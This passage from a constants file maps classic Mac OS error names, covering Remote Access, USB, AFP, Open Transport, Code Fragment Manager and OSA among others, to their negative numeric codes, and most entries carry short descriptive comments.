kRANCPRejectedbyPeer = -7136 #kRANCPRejectedbyPeer
kRAExtAuthenticationFailed = -7135 #kRAExtAuthenticationFailed
kRAATalkInactive = -7134 #kRAATalkInactive
kRAPeerNotResponding = -7133 #kRAPeerNotResponding
kRAPPPPeerDisconnected = -7132 #kRAPPPPeerDisconnected
kRAPPPUserDisconnected = -7131 #kRAPPPUserDisconnected
kRAPPPNegotiationFailed = -7130 #kRAPPPNegotiationFailed
kRAPPPAuthenticationFailed = -7129 #kRAPPPAuthenticationFailed
kRAPPPProtocolRejected = -7128 #kRAPPPProtocolRejected
dcmBufferOverflowErr = -7127 #data is larger than buffer size
kRANotPrimaryInterface = -7126 #when IPCP is not primary TCP/IP intf.
kRATCPIPNotConfigured = -7125 #TCP/IP not configured, could be loaded
kRATCPIPInactive = -7124 #TCP/IP inactive, cannot be loaded
kRARemoteAccessNotReady = -7123 #kRARemoteAccessNotReady
kRAInitOpenTransportFailed = -7122 #kRAInitOpenTransportFailed
dcmProtectedErr = -7121 #need keyword to use dictionary
kRAUserPwdEntryRequired = -7120 #kRAUserPwdEntryRequired
kRAUserPwdChangeRequired = -7119 #kRAUserPwdChangeRequired
dcmBadFindMethodErr = -7118 #no such find method supported
kRAInvalidSerialProtocol = -7117 #kRAInvalidSerialProtocol
kRAInvalidPortState = -7116 #kRAInvalidPortState
dcmBadKeyErr = -7115 #bad key information
kRAPortBusy = -7114 #kRAPortBusy
kRAInstallationDamaged = -7113 #kRAInstallationDamaged
dcmBadFieldTypeErr = -7112 #no such field type supported
dcmBadFieldInfoErr = -7111 #incomplete information
dcmNecessaryFieldErr = -7110 #lack required/identify field
dcmDupRecordErr = -7109 #same record already exist
kRANotConnected = -7108 #kRANotConnected
dcmBlockFullErr = -7107 #dictionary block full
kRAMissingResources = -7106 #kRAMissingResources
dcmDictionaryBusyErr = -7105 #dictionary is busy
dcmDictionaryNotOpenErr = -7104 #dictionary not opened
dcmPermissionErr = -7103 #invalid permission
dcmBadDictionaryErr = -7102 #invalid dictionary
dcmNotDictionaryErr = -7101 #not dictionary
kRAInvalidParameter = -7100 #kRAInvalidParameter
laEngineNotFoundErr = -7000 #can't find the engine
laPropertyErr = -6999 #Error in properties
kUSBUnknownDeviceErr = -6998 #device ref not recognised
laPropertyIsReadOnlyErr = -6997 #the property is read only
laPropertyUnknownErr = -6996 #the property is unknown to this environment
laPropertyValueErr = -6995 #Invalid property value
laDictionaryTooManyErr = -6994 #too many dictionaries
laDictionaryUnknownErr = -6993 #can't use this dictionary with this environment
laDictionaryNotOpenedErr = -6992 #the dictionary is not opened
laTextOverFlowErr = -6991 #text is too long
laFailAnalysisErr = -6990 #analysis failed
laNoMoreMorphemeErr = -6989 #nothing to read
laInvalidPathErr = -6988 #path is not correct
kUSBNotHandled = -6987 #Notification was not handled (same as NotFound)
laEnvironmentNotFoundErr = -6986 #can't fint the specified environment
laEnvironmentBusyErr = -6985 #specified environment is used
laTooSmallBufferErr = -6984 #output buffer is too small to store any result
kUSBFlagsError = -6983 #Unused flags not zeroed
kUSBAbortedError = -6982 #Pipe aborted
kUSBNoBandwidthError = -6981 #Not enough bandwidth available
kUSBPipeIdleError = -6980 #Pipe is Idle, it will not accept transactions
kUSBPipeStalledError = -6979 #Pipe has stalled, error needs to be cleared
kUSBUnknownInterfaceErr = -6978 #Interface ref not recognised
kUSBDeviceBusy = -6977 #Device is already being configured
kUSBDevicePowerProblem = -6976 #Device has a power problem
kUSBInvalidBuffer = -6975 #bad buffer, usually nil
kUSBDeviceSuspended = -6974 #Device is suspended
kUSBDeviceNotSuspended = -6973 #device is not suspended for resume
kUSBDeviceDisconnected = -6972 #Disconnected during suspend or reset
kUSBTimedOut = -6971 #Transaction timed out.
kUSBQueueAborted = -6970 #Pipe zero stall cleared.
kUSBPortDisabled = -6969 #The port you are attached to is disabled, use USBDeviceReset.
kUSBBadDispatchTable = -6950 #Improper driver dispatch table
kUSBUnknownNotification = -6949 #Notification type not defined
kUSBQueueFull = -6948 #Internal queue maxxed
kUSBLinkErr = -6916 #kUSBLinkErr
kUSBCRCErr = -6915 #Pipe stall, bad CRC
kUSBBitstufErr = -6914 #Pipe stall, bitstuffing
kUSBDataToggleErr = -6913 #Pipe stall, Bad data toggle
kUSBEndpointStallErr = -6912 #Device didn't understand
kUSBNotRespondingErr = -6911 #Pipe stall, No device, device hung
kUSBPIDCheckErr = -6910 #Pipe stall, PID CRC error
kUSBWrongPIDErr = -6909 #Pipe stall, Bad or wrong PID
kUSBOverRunErr = -6908 #Packet too large or more data than buffer
kUSBUnderRunErr = -6907 #Less data than buffer
kUSBRes1Err = -6906 #kUSBRes1Err
kUSBRes2Err = -6905 #kUSBRes2Err
kUSBBufOvrRunErr = -6904 #Host hardware failure on data in, PCI busy?
kUSBBufUnderRunErr = -6903 #Host hardware failure on data out, PCI busy?
kUSBNotSent1Err = -6902 #Transaction not sent
kUSBNotSent2Err = -6901 #Transaction not sent
kDMFoundErr = -6232 #Did not proceed because we found an item
kDMMainDisplayCannotMoveErr = -6231 #Trying to move main display (or a display mirrored to it)
kDMDisplayAlreadyInstalledErr = -6230 #Attempt to add an already installed display.
kDMDisplayNotFoundErr = -6229 #Could not find item (will someday remove).
kDMDriverNotDisplayMgrAwareErr = -6228 #Video Driver does not support display manager.
kDMSWNotInitializedErr = -6227 #Required software not initialized (eg windowmanager or display mgr).
kSysSWTooOld = -6226 #Missing critical pieces of System Software.
kDMMirroringNotOn = -6225 #Returned by all calls that need mirroring to be on to do their thing.
kDMCantBlock = -6224 #Mirroring is already on, canÕt Block now (call DMUnMirror() first).
kDMMirroringBlocked = -6223 #DMBlockMirroring() has been called.
kDMWrongNumberOfDisplays = -6222 #Can only handle 2 displays for now.
kDMMirroringOnAlready = -6221 #Returned by all calls that need mirroring to be off to do their thing.
kDMGenErr = -6220 #Unexpected Error
kQTSSUnknownErr = -6150 #kQTSSUnknownErr
collectionVersionErr = -5753 #collectionVersionErr
collectionIndexRangeErr = -5752 #collectionIndexRangeErr
collectionItemNotFoundErr = -5751 #collectionItemNotFoundErr
collectionItemLockedErr = -5750 #collectionItemLockedErr
kNavMissingKindStringErr = -5699 #kNavMissingKindStringErr
kNavInvalidCustomControlMessageErr = -5698 #kNavInvalidCustomControlMessageErr
kNavCustomControlMessageFailedErr = -5697 #kNavCustomControlMessageFailedErr
kNavInvalidSystemConfigErr = -5696 #kNavInvalidSystemConfigErr
kNavWrongDialogClassErr = -5695 #kNavWrongDialogClassErr
kNavWrongDialogStateErr = -5694 #kNavWrongDialogStateErr
dialogNoTimeoutErr = -5640 #dialogNoTimeoutErr
menuInvalidErr = -5623 #menu is invalid
menuItemNotFoundErr = -5622 #specified menu item wasn't found
menuUsesSystemDefErr = -5621 #GetMenuDefinition failed because the menu uses the system MDEF
menuNotFoundErr = -5620 #specified menu or menu ID wasn't found
windowWrongStateErr = -5615 #window is not in a state that is valid for the current action
windowManagerInternalErr = -5614 #something really weird happened inside the window manager
windowAttributesConflictErr = -5613 #passed some attributes that are mutually exclusive
windowAttributeImmutableErr = -5612 #tried to change attributes which can't be changed
errWindowDoesNotFitOnscreen = -5611 #ConstrainWindowToScreen could not make the window fit onscreen
errWindowNotFound = -5610 #returned from FindWindowOfClass
errFloatingWindowsNotInitialized = -5609 #called HideFloatingWindows or ShowFloatingWindows without calling InitFloatingWindows
errWindowsAlreadyInitialized = -5608 #tried to call InitFloatingWindows twice, or called InitWindows and then floating windows
errUserWantsToDragWindow = -5607 #if returned from TrackWindowProxyDrag, you should call DragWindow on the window
errCorruptWindowDescription = -5606 #tried to load a corrupt window description (size or version fields incorrect)
errUnrecognizedWindowClass = -5605 #tried to create a window with a bad WindowClass
errWindowPropertyNotFound = -5604 #tried to get a nonexistent property
errInvalidWindowProperty = -5603 #tried to access a property tag with private creator
errWindowDoesNotHaveProxy = -5602 #tried to do something requiring a proxy to a window which doesnÕt have a proxy
errUnsupportedWindowAttributesForClass = -5601 #tried to create a window with WindowAttributes not supported by the WindowClass
errInvalidWindowPtr = -5600 #tried to pass a bad WindowRef argument
gestaltLocationErr = -5553 #gestalt function ptr wasn't in sysheap
gestaltDupSelectorErr = -5552 #tried to add an entry that already existed
gestaltUndefSelectorErr = -5551 #undefined selector was passed to Gestalt
gestaltUnknownErr = -5550 #value returned if Gestalt doesn't know the answer
envVersTooBig = -5502 #Version bigger than call can handle
envBadVers = -5501 #Version non-positive
envNotPresent = -5500 #returned by glue.
qtsAddressBusyErr = -5421 #qtsAddressBusyErr
qtsConnectionFailedErr = -5420 #qtsConnectionFailedErr
qtsTimeoutErr = -5408 #qtsTimeoutErr
qtsUnknownValueErr = -5407 #qtsUnknownValueErr
qtsTooMuchDataErr = -5406 #qtsTooMuchDataErr
qtsUnsupportedFeatureErr = -5405 #qtsUnsupportedFeatureErr
qtsUnsupportedRateErr = -5404 #qtsUnsupportedRateErr
qtsUnsupportedDataTypeErr = -5403 #qtsUnsupportedDataTypeErr
qtsBadDataErr = -5402 #something is wrong with the data
qtsBadStateErr = -5401 #qtsBadStateErr
qtsBadSelectorErr = -5400 #qtsBadSelectorErr
errIAEndOfTextRun = -5388 #errIAEndOfTextRun
errIATextExtractionErr = -5387 #errIATextExtractionErr
errIAInvalidDocument = -5386 #errIAInvalidDocument
errIACanceled = -5385 #errIACanceled
errIABufferTooSmall = -5384 #errIABufferTooSmall
errIANoMoreItems = -5383 #errIANoMoreItems
errIAParamErr = -5382 #errIAParamErr
errIAAllocationErr = -5381 #errIAAllocationErr
errIAUnknownErr = -5380 #errIAUnknownErr
hrURLNotHandledErr = -5363 #hrURLNotHandledErr
hrUnableToResizeHandleErr = -5362 #hrUnableToResizeHandleErr
hrMiscellaneousExceptionErr = -5361 #hrMiscellaneousExceptionErr
hrHTMLRenderingLibNotInstalledErr = -5360 #hrHTMLRenderingLibNotInstalledErr
errCannotUndo = -5253 #errCannotUndo
errNonContiuousAttribute = -5252 #errNonContiuousAttribute
errUnknownElement = -5251 #errUnknownElement
errReadOnlyText = -5250 #errReadOnlyText
errEmptyScrap = -5249 #errEmptyScrap
errNoHiliteText = -5248 #errNoHiliteText
errOffsetNotOnElementBounday = -5247 #errOffsetNotOnElementBounday
errInvalidRange = -5246 #errInvalidRange
errIteratorReachedEnd = -5245 #errIteratorReachedEnd
errEngineNotFound = -5244 #errEngineNotFound
errAlreadyInImagingMode = -5243 #errAlreadyInImagingMode
errNotInImagingMode = -5242 #errNotInImagingMode
errMarginWilllNotFit = -5241 #errMarginWilllNotFit
errUnknownAttributeTag = -5240 #errUnknownAttributeTag
afpSameNodeErr = -5063 #An Attempt was made to connect to a file server running on the same machine
afpAlreadyMounted = -5062 #The volume is already mounted
afpCantMountMoreSrvre = -5061 #The Maximum number of server connections has been reached
afpBadDirIDType = -5060 #afpBadDirIDType
afpCallNotAllowed = -5048 #The server knows what you wanted to do, but won't let you do it just now
afpAlreadyLoggedInErr = -5047 #User has been authenticated but is already logged in from another machine (and that's not allowed on this server)
afpPwdPolicyErr = -5046 #Password does not conform to servers password policy
afpPwdNeedsChangeErr = -5045 #The password needs to be changed
afpInsideTrashErr = -5044 #The folder being shared is inside the trash folder OR the shared folder is being moved into the trash folder
afpInsideSharedErr = -5043 #The folder being shared is inside a shared folder OR the folder contains a shared folder and is being moved into a shared folder
afpPwdExpiredErr = -5042 #The password being used is too old: this requires the user to change the password before log-in can continue
afpPwdTooShortErr = -5041 #The password being set is too short: there is a minimum length that must be met or exceeded
afpPwdSameErr = -5040 #Someone tried to change their password to the same password on a mantadory password change
afpBadIDErr = -5039 #afpBadIDErr
afpSameObjectErr = -5038 #afpSameObjectErr
afpCatalogChanged = -5037 #afpCatalogChanged
afpDiffVolErr = -5036 #afpDiffVolErr
afpIDExists = -5035 #afpIDExists
afpIDNotFound = -5034 #afpIDNotFound
afpContainsSharedErr = -5033 #the folder being shared contains a shared folder
afpObjectLocked = -5032 #Object is M/R/D/W inhibited
afpVolLocked = -5031 #Volume is Read-Only
afpIconTypeError = -5030 #Icon size specified different from existing icon size
afpDirNotFound = -5029 #Unknown directory specified
afpCantRename = -5028 #AFPRename cannot rename volume
afpServerGoingDown = -5027 #Server is shutting down
afpTooManyFilesOpen = -5026 #Maximum open file count reached
afpObjectTypeErr = -5025 #File/Directory specified where Directory/File expected
afpCallNotSupported = -5024 #Unsupported AFP call was made
afpUserNotAuth = -5023 #No AFPLogin call has successfully been made for this session
afpSessClosed = -5022 #Session closed
afpRangeOverlap = -5021 #Some or all of range already locked by same user
afpRangeNotLocked = -5020 #Tried to unlock range that was not locked by user
afpParmErr = -5019 #A specified parameter was out of allowable range
afpObjectNotFound = -5018 #Specified file or directory does not exist
afpObjectExists = -5017 #Specified destination file or directory already exists
afpNoServer = -5016 #Server not responding
afpNoMoreLocks = -5015 #Maximum lock limit reached
afpMiscErr = -5014 #Unexpected error encountered during execution
afpLockErr = -5013 #Some or all of requested range is locked by another user
afpItemNotFound = -5012 #Unknown UserName/UserID or missing comment/APPL entry
afpFlatVol = -5011 #Cannot create directory on specified volume
afpFileBusy = -5010 #Cannot delete an open file
afpEofError = -5009 #Read beyond logical end-of-file
afpDiskFull = -5008 #Insufficient free space on volume for operation
afpDirNotEmpty = -5007 #Cannot delete non-empty directory
afpDenyConflict = -5006 #Specified open/deny modes conflict with current open modes
afpCantMove = -5005 #Move destination is offspring of source, or root was specified
afpBitmapErr = -5004 #Bitmap contained bits undefined for call
afpBadVersNum = -5003 #Unknown AFP protocol version number specified
afpBadUAM = -5002 #Unknown user authentication method specified
afpAuthContinue = -5001 #Further information required to complete AFPLogin call
afpAccessDenied = -5000 #Insufficient access privileges for operation
illegalScrapFlavorSizeErr = -4999 #illegalScrapFlavorSizeErr
illegalScrapFlavorTypeErr = -4998 #illegalScrapFlavorTypeErr
illegalScrapFlavorFlagsErr = -4997 #illegalScrapFlavorFlagsErr
scrapFlavorSizeMismatchErr = -4996 #scrapFlavorSizeMismatchErr
scrapFlavorFlagsMismatchErr = -4995 #scrapFlavorFlagsMismatchErr
nilScrapFlavorDataErr = -4994 #nilScrapFlavorDataErr
noScrapPromiseKeeperErr = -4993 #noScrapPromiseKeeperErr
scrapPromiseNotKeptErr = -4992 #scrapPromiseNotKeptErr
processStateIncorrectErr = -4991 #processStateIncorrectErr
badScrapRefErr = -4990 #badScrapRefErr
duplicateScrapFlavorErr = -4989 #duplicateScrapFlavorErr
internalScrapErr = -4988 #internalScrapErr
coreFoundationUnknownErr = -4960 #coreFoundationUnknownErr
badRoutingSizeErr = -4276 #badRoutingSizeErr
routingNotFoundErr = -4275 #routingNotFoundErr
duplicateRoutingErr = -4274 #duplicateRoutingErr
invalidFolderTypeErr = -4273 #invalidFolderTypeErr
noMoreFolderDescErr = -4272 #noMoreFolderDescErr
duplicateFolderDescErr = -4271 #duplicateFolderDescErr
badFolderDescErr = -4270 #badFolderDescErr
cmCantGamutCheckError = -4217 #Gammut checking not supported by this ColorWorld
cmNamedColorNotFound = -4216 #NamedColor not found
cmCantCopyModifiedV1Profile = -4215 #Illegal to copy version 1 profiles that have been modified
cmRangeOverFlow = -4214 #Color conversion warning that some output color values over/underflowed and were clipped
cmInvalidProfileComment = -4213 #Bad Profile comment during drawpicture
cmNoGDevicesError = -4212 #Begin/End Matching -- no gdevices available
cmInvalidDstMap = -4211 #Destination pix/bit map was invalid
cmInvalidSrcMap = -4210 #Source pix/bit map was invalid
cmInvalidColorSpace = -4209 #Profile colorspace does not match bitmap type
cmErrIncompatibleProfile = -4208 #Other ColorSync Errors
cmSearchError = -4207 #cmSearchError
cmInvalidSearch = -4206 #Bad Search Handle
cmInvalidProfileLocation = -4205 #Operation not supported for this profile location
cmInvalidProfile = -4204 #A Profile must contain a 'cs1 ' tag to be valid
cmFatalProfileErr = -4203 #cmFatalProfileErr
cmCantDeleteElement = -4202 #cmCantDeleteElement
cmIndexRangeErr = -4201 #Tag index out of range
kNSLInitializationFailed = -4200 #UNABLE TO INITIALIZE THE MANAGER!!!!! DO NOT CONTINUE!!!!
kNSLNotInitialized = -4199 #kNSLNotInitialized
kNSLInsufficientSysVer = -4198 #kNSLInsufficientSysVer
kNSLInsufficientOTVer = -4197 #kNSLInsufficientOTVer
kNSLNoElementsInList = -4196 #kNSLNoElementsInList
kNSLBadReferenceErr = -4195 #kNSLBadReferenceErr
kNSLBadServiceTypeErr = -4194 #kNSLBadServiceTypeErr
kNSLBadDataTypeErr = -4193 #kNSLBadDataTypeErr
kNSLBadNetConnection = -4192 #kNSLBadNetConnection
kNSLNoSupportForService = -4191 #kNSLNoSupportForService
kNSLInvalidPluginSpec = -4190 #kNSLInvalidPluginSpec
kNSLRequestBufferAlreadyInList = -4189 #kNSLRequestBufferAlreadyInList
kNSLNoContextAvailable = -4188 #(ContinueLookup function ptr invalid)
kNSLBufferTooSmallForData = -4187 #(Client buffer too small for data from plugin)
kNSLCannotContinueLookup = -4186 #(Can't continue lookup; error or bad state)
kNSLBadClientInfoPtr = -4185 #(nil ClientAsyncInfoPtr; no reference available)
kNSLNullListPtr = -4184 #(client is trying to add items to a nil list)
kNSLBadProtocolTypeErr = -4183 #(client is trying to add a null protocol type)
kNSLPluginLoadFailed = -4182 #(manager unable to load one of the plugins)
kNSLNoPluginsFound = -4181 #(manager didn't find any valid plugins to load)
kNSLSearchAlreadyInProgress = -4180 #(you can only have one ongoing search per clientRef)
kNSLNoPluginsForSearch = -4179 #(no plugins will respond to search request; bad protocol(s)?)
kNSLNullNeighborhoodPtr = -4178 #(client passed a null neighborhood ptr)
kNSLSomePluginsFailedToLoad = -4177 #(one or more plugins failed to load, but at least one did load; this error isn't fatal)
kNSLErrNullPtrError = -4176 #kNSLErrNullPtrError
kNSLNotImplementedYet = -4175 #kNSLNotImplementedYet
kNSLUILibraryNotAvailable = -4174 #The NSL UI Library needs to be in the Extensions Folder
kNSLNoCarbonLib = -4173 #kNSLNoCarbonLib
kNSLBadURLSyntax = -4172 #URL contains illegal characters
kNSLSchedulerError = -4171 #A custom thread routine encountered an error
kNSL68kContextNotSupported = -4170 #no 68k allowed
noHelpForItem = -4009 #noHelpForItem
badProfileError = -4008 #badProfileError
colorSyncNotInstalled = -4007 #colorSyncNotInstalled
pickerCantLive = -4006 #pickerCantLive
cantLoadPackage = -4005 #cantLoadPackage
cantCreatePickerWindow = -4004 #cantCreatePickerWindow
cantLoadPicker = -4003 #cantLoadPicker
pickerResourceError = -4002 #pickerResourceError
requiredFlagsDontMatch = -4001 #requiredFlagsDontMatch
firstPickerError = -4000 #firstPickerError
kOTPortLostConnection = -3285 #
kOTUserRequestedErr = -3284 #
kOTConfigurationChangedErr = -3283 #
kOTBadConfigurationErr = -3282 #
kOTPortWasEjectedErr = -3281 #
kOTPortHasDiedErr = -3280 #
kOTClientNotInittedErr = -3279 #
kENOMSGErr = -3278 #
kESRCHErr = -3277 #
kEINPROGRESSErr = -3276 #
kENODATAErr = -3275 #
kENOSTRErr = -3274 #
kECANCELErr = -3273 #
kEBADMSGErr = -3272 #
kENOSRErr = -3271 #
kETIMEErr = -3270 #
kEPROTOErr = -3269 # fill out missing codes
kEHOSTUNREACHErr = -3264 #No route to host
kEHOSTDOWNErr = -3263 #Host is down
kECONNREFUSEDErr = -3260 #Connection refused
kETIMEDOUTErr = -3259 #Connection timed out
kETOOMANYREFSErr = -3258 #Too many references: can't splice
kESHUTDOWNErr = -3257 #Can't send after socket shutdown
kENOTCONNErr = -3256 #Socket is not connected
kEISCONNErr = -3255 #Socket is already connected
kENOBUFSErr = -3254 #No buffer space available
kECONNRESETErr = -3253 #Connection reset by peer
kECONNABORTEDErr = -3252 #Software caused connection abort
kENETRESETErr = -3251 #Network dropped connection on reset
kENETUNREACHErr = -3250 #Network is unreachable
kENETDOWNErr = -3249 #Network is down
kEADDRNOTAVAILErr = -3248 #Can't assign requested address
kEADDRINUSEErr = -3247 #Address already in use
kEOPNOTSUPPErr = -3244 #Operation not supported on socket
kESOCKTNOSUPPORTErr = -3243 #Socket type not supported
kEPROTONOSUPPORTErr = -3242 #Protocol not supported
kENOPROTOOPTErr = -3241 #Protocol not available
kEPROTOTYPEErr = -3240 #Protocol wrong type for socket
kEMSGSIZEErr = -3239 #Message too long
kEDESTADDRREQErr = -3238 #Destination address required
kENOTSOCKErr = -3237 #Socket operation on non-socket
kEALREADYErr = -3236 #
kEWOULDBLOCKErr = -3234 #Call would block, so was aborted
kERANGEErr = -3233 #Message size too large for STREAM
kEPIPEErr = -3231 #Broken pipe
kENOTTYErr = -3224 #Not a character device
kEINVALErr = -3221 #Invalid argument
kENODEVErr = -3218 #No such device
kOTDuplicateFoundErr = -3216 #OT generic duplicate found error
kEBUSYErr = -3215 #Device or resource busy
kEFAULTErr = -3213 #Bad address
kEACCESErr = -3212 #Permission denied
kOTOutOfMemoryErr = -3211 #OT ran out of memory, may be a temporary
kEAGAINErr = -3210 #Try operation again later
kEBADFErr = -3208 #Bad file number
kENXIOErr = -3205 #No such device or address
kEIOErr = -3204 #I/O error
kEINTRErr = -3203 #Interrupted system service
kENORSRCErr = -3202 #No such resource
kOTNotFoundErr = -3201 #OT generic not found error
kEPERMErr = -3200 #Permission denied
kOTCanceledErr = -3180 #XTI2OSStatus(TCANCELED) The command was cancelled
kOTBadSyncErr = -3179 #XTI2OSStatus(TBADSYNC) A synchronous call at interrupt time
kOTProtocolErr = -3178 #XTI2OSStatus(TPROTO) An unspecified provider error occurred
kOTQFullErr = -3177 #XTI2OSStatus(TQFULL)
kOTResAddressErr = -3176 #XTI2OSStatus(TRESADDR)
kOTResQLenErr = -3175 #XTI2OSStatus(TRESQLEN)
kOTProviderMismatchErr = -3174 #XTI2OSStatus(TPROVMISMATCH) Tried to accept on incompatible endpoint
kOTIndOutErr = -3173 #XTI2OSStatus(TINDOUT) Accept failed because of pending listen
kOTAddressBusyErr = -3172 #XTI2OSStatus(TADDRBUSY) Address requested is already in use
kOTBadQLenErr = -3171 #XTI2OSStatus(TBADQLEN) A Bind to an in-use addr with qlen > 0
kOTBadNameErr = -3170 #XTI2OSStatus(TBADNAME) A bad endpoint name was supplied
kOTNoStructureTypeErr = -3169 #XTI2OSStatus(TNOSTRUCTYPE) Bad structure type requested for OTAlloc
kOTStateChangeErr = -3168 #XTI2OSStatus(TSTATECHNG) State is changing - try again later
kOTNotSupportedErr = -3167 #XTI2OSStatus(TNOTSUPPORT) Command is not supported
kOTNoReleaseErr = -3166 #XTI2OSStatus(TNOREL) No orderly release indication available
kOTBadFlagErr = -3165 #XTI2OSStatus(TBADFLAG) A Bad flag value was supplied
kOTNoUDErrErr = -3164 #XTI2OSStatus(TNOUDERR) No Unit Data Error indication available
kOTNoDisconnectErr = -3163 #XTI2OSStatus(TNODIS) No disconnect indication available
kOTNoDataErr = -3162 #XTI2OSStatus(TNODATA) No data available for reading
kOTFlowErr = -3161 #XTI2OSStatus(TFLOW) Provider is flow-controlled
kOTBufferOverflowErr = -3160 #XTI2OSStatus(TBUFOVFLW) Passed buffer not big enough
kOTBadDataErr = -3159 #XTI2OSStatus(TBADDATA) An illegal amount of data was specified
kOTLookErr = -3158 #XTI2OSStatus(TLOOK) An event occurred - call Look()
kOTSysErrorErr = -3157 #XTI2OSStatus(TSYSERR) A system error occurred
kOTBadSequenceErr = -3156 #XTI2OSStatus(TBADSEQ) Sequence specified does not exist
kOTOutStateErr = -3155 #XTI2OSStatus(TOUTSTATE) Call issued in wrong state
kOTNoAddressErr = -3154 #XTI2OSStatus(TNOADDR) No address was specified
kOTBadReferenceErr = -3153 #XTI2OSStatus(TBADF) Bad provider reference
kOTAccessErr = -3152 #XTI2OSStatus(TACCES) Missing access permission
kOTBadOptionErr = -3151 #XTI2OSStatus(TBADOPT) A Bad option was specified
kOTBadAddressErr = -3150 #XTI2OSStatus(TBADADDR) A Bad address was specified
sktClosedErr = -3109 #sktClosedErr
recNotFnd = -3108 #recNotFnd
atpBadRsp = -3107 #atpBadRsp
atpLenErr = -3106 #atpLenErr
readQErr = -3105 #readQErr
extractErr = -3104 #extractErr
ckSumErr = -3103 #ckSumErr
noMPPErr = -3102 #noMPPErr
buf2SmallErr = -3101 #buf2SmallErr
noPrefAppErr = -3032 #noPrefAppErr
badTranslationSpecErr = -3031 #badTranslationSpecErr
noTranslationPathErr = -3030 #noTranslationPathErr
couldNotParseSourceFileErr = -3026 #Source document does not contain source type
invalidTranslationPathErr = -3025 #Source type to destination type not a valid path
retryComponentRegistrationErr = -3005 #retryComponentRegistrationErr
unresolvedComponentDLLErr = -3004 #unresolvedComponentDLLErr
componentDontRegister = -3003 #componentDontRegister
componentNotCaptured = -3002 #componentNotCaptured
validInstancesExist = -3001 #validInstancesExist
invalidComponentID = -3000 #invalidComponentID
cfragLastErrCode = -2899 #The last value in the range of CFM errors.
cfragOutputLengthErr = -2831 #An output parameter is too small to hold the value.
cfragAbortClosureErr = -2830 #Used by notification handlers to abort a closure.
cfragClosureIDErr = -2829 #The closure ID was not valid.
cfragContainerIDErr = -2828 #The fragment container ID was not valid.
cfragNoRegistrationErr = -2827 #The registration name was not found.
cfragNotClosureErr = -2826 #The closure ID was actually a connection ID.
cfragFileSizeErr = -2825 #A file was too large to be mapped.
cfragFragmentUsageErr = -2824 #A semantic error in usage of the fragment.
cfragArchitectureErr = -2823 #A fragment has an unacceptable architecture.
cfragNoApplicationErr = -2822 #No application member found in the cfrg resource.
cfragInitFunctionErr = -2821 #A fragment's initialization routine returned an error.
cfragFragmentCorruptErr = -2820 #A fragment's container was corrupt (known format).
cfragCFMInternalErr = -2819 #An internal inconstistancy has been detected.
cfragCFMStartupErr = -2818 #Internal error during CFM initialization.
cfragLibConnErr = -2817 #
cfragInitAtBootErr = -2816 #A boot library has an initialization function. (System 7 only)
cfragInitLoopErr = -2815 #Circularity in required initialization order.
cfragImportTooNewErr = -2814 #An import library was too new for a client.
cfragImportTooOldErr = -2813 #An import library was too old for a client.
cfragInitOrderErr = -2812 #
cfragNoIDsErr = -2811 #No more CFM IDs for contexts, connections, etc.
cfragNoClientMemErr = -2810 #Out of memory for fragment mapping or section instances.
cfragNoPrivateMemErr = -2809 #Out of memory for internal bookkeeping.
cfragNoPositionErr = -2808 #The registration insertion point was not found.
cfragUnresolvedErr = -2807 #A fragment had "hard" unresolved imports.
cfragFragmentFormatErr = -2806 #A fragment's container format is unknown.
cfragDupRegistrationErr = -2805 #The registration name was already in use.
cfragNoLibraryErr = -2804 #The named library was not found.
cfragNoSectionErr = -2803 #The specified section was not found.
cfragNoSymbolErr = -2802 #The specified symbol was not found.
cfragConnectionIDErr = -2801 #The connection ID was not valid.
cfragFirstErrCode = -2800 #The first value in the range of CFM errors.
errASInconsistentNames = -2780 #English errors:
errASNoResultReturned = -2763 #The range -2780 thru -2799 is reserved for dialect specific error codes. (Error codes from different dialects may overlap.)
errASParameterNotForEvent = -2762 #errASParameterNotForEvent
errASIllegalFormalParameter = -2761 #errASIllegalFormalParameter
errASTerminologyNestingTooDeep = -2760 #errASTerminologyNestingTooDeep
OSAControlFlowError = -2755 #Signaled when illegal control flow occurs in an application (no catcher for throw, non-lexical loop exit, etc.)
OSAInconsistentDeclarations = -2754 #Signaled when a variable is declared inconsistently in the same scope, such as both local and global
OSAUndefinedVariable = -2753 #Signaled when a variable is accessed that has no value
OSADuplicateHandler = -2752 #Signaled when more than one handler is defined with the same name in a scope where the language doesn't allow it
OSADuplicateProperty = -2751 #Signaled when a formal parameter, local variable, or instance variable is specified more than once.
OSADuplicateParameter = -2750 #Signaled when a formal parameter, local variable, or instance variable is specified more than once
OSATokenTooLong = -2742 #Signaled when a name or number is too long to be parsed
OSASyntaxTypeError = -2741 #Signaled when another form of syntax was expected. (e.g. "expected a <type> but found <this>")
OSASyntaxError = -2740 #Signaled when a syntax error occurs. (e.g. "Syntax error" or "<this> can't go after <that>")
errASCantCompareMoreThan32k = -2721 #Parser/Compiler errors:
errASCantConsiderAndIgnore = -2720 #errASCantConsiderAndIgnore
errOSACantCreate = -2710 #errOSACantCreate
errOSACantGetTerminology = -2709 #errOSACantGetTerminology
errOSADataBlockTooLarge = -2708 #Signaled when an intrinsic limitation is exceeded for the size of a value or data structure.
errOSAInternalTableOverflow = -2707 #Signaled when a runtime internal data structure overflows
errOSAStackOverflow = -2706 #Signaled when the runtime stack overflows
errOSACorruptTerminology = -2705 #Signaled when an application's terminology resource is not readable
errOSAAppNotHighLevelEventAware = -2704 #Signaled when an application can't respond to AppleEvents
errOSACantLaunch = -2703 #Signaled when application can't be launched or when it is remote and program linking is not enabled
errOSANumericOverflow = -2702 #Signaled when integer or real value is too large to be represented
errOSADivideByZero = -2701 #Signaled when there is an attempt to divide by zero
errOSAGeneralError = -2700 #Signaled by user scripts or applications when no actual error code is to be returned.
noIconDataAvailableErr = -2582 #The necessary icon data is not available
noSuchIconErr = -2581 #The requested icon could not be found
invalidIconRefErr = -2580 #The icon ref is not valid
nrCallNotSupported = -2557 #This call is not available or supported on this machine
nrTransactionAborted = -2556 #transaction was aborted
nrExitedIteratorScope = -2555 #outer scope of iterator was exited
nrIterationDone = -2554 #iteration operation is done
nrPropertyAlreadyExists = -2553 #property already exists
nrInvalidEntryIterationOp = -2552 #invalid entry iteration operation
nrPathBufferTooSmall = -2551 #buffer for path is too small
nrPathNotFound = -2550 #a path component lookup failed
nrResultCodeBase = -2549 #nrResultCodeBase
nrOverrunErr = -2548 #nrOverrunErr
nrNotModifiedErr = -2547 #nrNotModifiedErr
nrTypeMismatchErr = -2546 #nrTypeMismatchErr
nrPowerSwitchAbortErr = -2545 #nrPowerSwitchAbortErr
nrPowerErr = -2544 #nrPowerErr
nrDataTruncatedErr = -2543 #nrDataTruncatedErr
